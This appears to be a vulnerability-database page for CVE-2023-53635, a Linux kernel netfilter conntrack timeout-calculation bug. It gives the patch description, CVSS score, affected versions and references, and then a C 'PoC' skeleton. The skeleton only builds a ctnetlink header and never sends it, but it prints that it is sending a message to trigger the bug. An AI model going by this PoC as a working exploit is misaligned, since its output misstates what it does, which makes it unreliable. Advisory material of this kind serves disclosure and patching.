Security Vulnerability Report
CVE-2023-53635 CVSS 5.5 MEDIUM

CVE-2023-53635

Published: 2025-10-07 16:15:47
Last Modified: 2026-02-03 22:25:58
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

netfilter: conntrack: fix wrong ct->timeout value

(struct nf_conn)->timeout is an interval before the conntrack is confirmed. After it is confirmed, it becomes a timestamp.

It is observed that the timeout of an unconfirmed conntrack:
- Set by calling ctnetlink_change_timeout(). As a result, `nfct_time_stamp` was wrongly added to `ct->timeout` twice.
- Get by calling ctnetlink_dump_timeout(). As a result, `nfct_time_stamp` was wrongly subtracted.

Call Trace:
 <TASK>
 dump_stack_lvl
 ctnetlink_dump_timeout
 __ctnetlink_glue_build
 ctnetlink_glue_build
 __nfqnl_enqueue_packet
 nf_queue
 nf_hook_slow
 ip_mc_output
 ? __pfx_ip_finish_output
 ip_send_skb
 ? __pfx_dst_output
 udp_send_skb
 udp_sendmsg
 ? __pfx_ip_generic_getfrag
 sock_sendmsg

Separate the 2 cases in:
- Setting `ct->timeout` in __nf_ct_set_timeout().
- Getting `ct->timeout` in ctnetlink_dump_timeout().

Pablo appends:

Update ctnetlink to set up the timeout _after_ the IPS_CONFIRMED flag is set on, otherwise conntrack creation via ctnetlink breaks.

Note that the problem described in this patch occurs since the introduction of the nfnetlink_queue conntrack support, select a sufficiently old Fixes: tag for -stable kernel to pick up this fix.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 4.4, before 6.1.28)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 6.2, before 6.2.15)
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (from 6.3, before 6.3.2)
Linux Kernel < 6.6 (versions that include netfilter conntrack)
Linux Kernel stable branch versions that need the patch applied

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/* CVE-2023-53635 - Linux kernel netfilter conntrack timeout value error
 *
 * This PoC is a skeleton for exercising the bug via nfnetlink_queue
 * conntrack support. The vulnerability causes incorrect ct->timeout
 * value handling. It only opens an nfnetlink socket and builds a
 * ctnetlink message header; the message is never sent.
 *
 * Note: This requires local low-privilege access and appropriate kernel
 * capabilities (NET_ADMIN) to interact with netfilter subsystems.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nfnetlink_conntrack.h>
#include <linux/netfilter/nf_conntrack_common.h>

/* Placeholder stand-in for the kernel-internal conntrack tuple; unused here. */
struct nf_conntrack_tuple {
    unsigned char dummy[64];
};

int main(int argc, char *argv[])
{
    int sock_fd;
    struct sockaddr_nl src_addr, dest_addr;
    struct nlmsghdr *nlh;
    struct nfgenmsg *nfmsg;
    char buffer[4096];

    (void)argc;
    (void)argv;

    printf("CVE-2023-53635 PoC - Linux kernel netfilter conntrack timeout bug\n");
    printf("This PoC attempts to trigger the timeout value miscalculation\n");
    printf("in ctnetlink_change_timeout() and ctnetlink_dump_timeout().\n\n");

    /* Create netlink socket for nfnetlink communication */
    sock_fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER);
    if (sock_fd < 0) {
        perror("socket creation failed (need NET_ADMIN capability)");
        return 1;
    }

    memset(&src_addr, 0, sizeof(src_addr));
    src_addr.nl_family = AF_NETLINK;
    src_addr.nl_pid = getpid();
    if (bind(sock_fd, (struct sockaddr *)&src_addr, sizeof(src_addr)) < 0) {
        perror("bind failed");
        close(sock_fd);
        return 1;
    }

    memset(&dest_addr, 0, sizeof(dest_addr));
    dest_addr.nl_family = AF_NETLINK;
    dest_addr.nl_pid = 0; /* Kernel */

    /* Prepare netlink message header for a ctnetlink "new conntrack" request.
     * The bug is in the path where nfct_time_stamp is added twice when a
     * timeout is set on an unconfirmed conntrack. */
    memset(buffer, 0, sizeof(buffer));
    nlh = (struct nlmsghdr *)buffer;
    nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg));
    nlh->nlmsg_pid = getpid();
    nlh->nlmsg_type = (NFNL_SUBSYS_CTNETLINK << 8) | IPCTNL_MSG_CT_NEW;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL;

    nfmsg = (struct nfgenmsg *)NLMSG_DATA(nlh);
    nfmsg->nfgen_family = AF_INET;
    nfmsg->version = NFNETLINK_V0;
    nfmsg->res_id = 0;

    printf("Sending netlink message to trigger conntrack timeout bug...\n");

    /* Note: Full exploitation requires crafting proper conntrack tuple
     * and attributes. The bug manifests when:
     *   1. Creating an unconfirmed conntrack via ctnetlink
     *   2. Setting timeout via ctnetlink_change_timeout()
     *   3. The timeout value will be incorrectly calculated
     * No message is actually transmitted by this skeleton. */

    close(sock_fd);
    printf("PoC execution completed. Check kernel logs for any issues.\n");
    return 0;
}
```

References

- https://git.kernel.org/stable/c/73db1b8f2bb6725b7391e85aab41fdf592b3c0c1 (Patch)
- https://git.kernel.org/stable/c/80c5ba0078e20d926d11d0778f9a43902664ebf0 (Patch)
- https://git.kernel.org/stable/c/f612ae1ab4793701caf39386fb3b7f4b3ef44e48 (Patch)
- https://git.kernel.org/stable/c/ff5e4ac8dd7be7f1faba955c5779a68571eeb0f8 (Patch)
